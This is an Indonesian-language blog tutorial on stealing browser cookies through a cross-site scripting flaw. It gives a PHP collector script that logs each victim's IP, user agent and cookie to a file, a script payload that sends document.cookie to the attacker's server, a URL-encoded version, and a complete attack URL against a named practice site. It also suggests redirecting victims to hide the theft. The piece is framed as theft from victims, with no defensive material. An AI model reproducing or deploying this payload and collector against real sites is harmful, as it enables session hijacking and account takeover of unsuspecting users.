Stealing Cookie With XSS

Learn System Security - Halo sobat semuanya, apa kabarnya? semoga baik-baik aja ya. Di artikel ini saya akan sedikit memberi tutorial bagaimana cara mencuri Cookie dengan Bug XSS.


Yang pertama kalian siapkan target web yang Vulnerable terhadap XSS dulu, disini saya pakai website:
http://xssme.berita-internetku.com/level1.php

Lalu kalian buat file PHP dan simpan pada server atau website kalian, untuk kodenya kalian bisa copy dibawah ini:
<?php
if(isset($_GET['cookie'])){
    date_default_timezone_set("Asia/Jakarta");
    $data = "date: ".date ("l d F o h:i:s A")."\nip: ".$_SERVER['REMOTE_ADDR']."\nuser-agent: ".$_SERVER['HTTP_USER_AGENT']."\ncookie: ".$_GET['cookie']."\n\n";
   
    $open = fopen("cookie.txt","a");
    $source = fwrite($open,$data);
}

Untuk payloads yang digunakan untuk mencuri cookie kita menggunakan:
<script>document.location="http://site.com/file.php?cookie="+document.cookie</script>
Pada site.com nanti kalian ganti dengan web kalian sendiri dan file.php adalah file yang dibuat tadi.

Contoh payloads yang saya gunakan:
<script>document.location="http://localhost/security/stealcookie/action.php%3fcookie%3d"%2Bdocument.cookie</script>
Payloads diatas sudah saya encode untuk karakter ? = +
? menjadi %3f
= menjadi %3d
+ menjadi %2b

URL lengkap dari situs yang Vulnerability XSS dengan Payloads, seperti:
http://xssme.berita-internetku.com/level1.php?q=<script>document.location="http://localhost/security/stealcookie/action.php%3fcookie%3d"%2Bdocument.cookie</script>

Berikut ini source kode dari halaman yang ingin dicuri cookienya

Setelah korban membuka URL, Cookie akan langsung tersimpan di file cookie.txt

note: kalian bisa menambahkan header("location:abc.com") pada file.php jika ingin korban langsung redirect ke situs abc.com.

Sekian dari saya, semoga dapat membantu sobat, terimakasih.

0 comments